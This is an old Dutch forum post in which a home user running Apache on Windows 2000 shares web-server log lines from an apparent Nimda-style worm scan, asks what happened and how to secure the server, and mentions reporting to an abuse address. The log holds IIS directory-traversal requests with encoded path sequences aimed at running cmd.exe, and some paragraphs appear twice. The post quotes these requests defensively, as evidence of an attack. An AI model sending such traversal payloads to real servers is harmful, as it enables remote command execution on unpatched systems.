Ik heb Apache pas geleden geïnstalleerd onder Win2k. Omdat ie nog niet is geconfigureerd
én omdat ik niet zeker ben van de veiligheid ervan (moet ik me nog in verdiepen),
heb ik via Atguard inbound TCP port 80 geblockt.
Vanmiddag stond Atguard even uit, zie ik meteen het volgende in mijn logs (ik heb het IP
voorlopig even verminkt):
Zie ik het goed? Probeerde iemand mijn Command Prompt te starten? Kan iemand
mij precies vertellen wat hier nou is gebeurd? En hoe ik dat kan voorkomen door Apache
veilig in te stellen? Overigens zette ik halverwege Atguard weer aan en begon
ie meteen te blokken. Dus ik denk no harm done. Toch?
Toen ik vervolgens de webserver van de attacker bezocht, kon ik meteen Nimda downen.
Sowieso een lul dus. I.i.g. een berichtje naar abuse@xs4all.nl dacht ik zo.
én omdat ik niet zeker ben van de veiligheid ervan (moet ik me nog in verdiepen),
heb ik via Atguard inbound TCP port 80 geblockt.
Vanmiddag stond Atguard even uit, zie ik meteen het volgende in mijn logs (ik heb het IP
voorlopig even verminkt):
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| 213.84.54.*** - - [06/Nov/2001:16:08:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 213.84.54.*** - - [06/Nov/2001:16:08:53 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 213.84.54.*** - - [06/Nov/2001:16:08:55 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 213.84.54.*** - - [06/Nov/2001:16:08:56 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 213.84.54.*** - - [06/Nov/2001:16:08:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.84.54.*** - - [06/Nov/2001:16:09:01 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 213.84.54.*** - - [06/Nov/2001:16:09:03 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 213.84.54.*** - - [06/Nov/2001:16:09:04 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 213.84.54.*** - - [06/Nov/2001:16:09:05 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 213.84.54.*** - - [06/Nov/2001:16:09:06 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 213.84.54.*** - - [06/Nov/2001:16:09:08 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 213.84.54.*** - - [06/Nov/2001:16:09:10 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 213.84.54.*** - - [06/Nov/2001:16:09:11 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 213.84.54.*** - - [06/Nov/2001:16:09:12 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 |
Zie ik het goed? Probeerde iemand mijn Command Prompt te starten? Kan iemand
mij precies vertellen wat hier nou is gebeurd? En hoe ik dat kan voorkomen door Apache
veilig in te stellen? Overigens zette ik halverwege Atguard weer aan en begon
ie meteen te blokken. Dus ik denk no harm done. Toch?
Toen ik vervolgens de webserver van de attacker bezocht, kon ik meteen Nimda downen.
Sowieso een lul dus. I.i.g. een berichtje naar abuse@xs4all.nl dacht ik zo.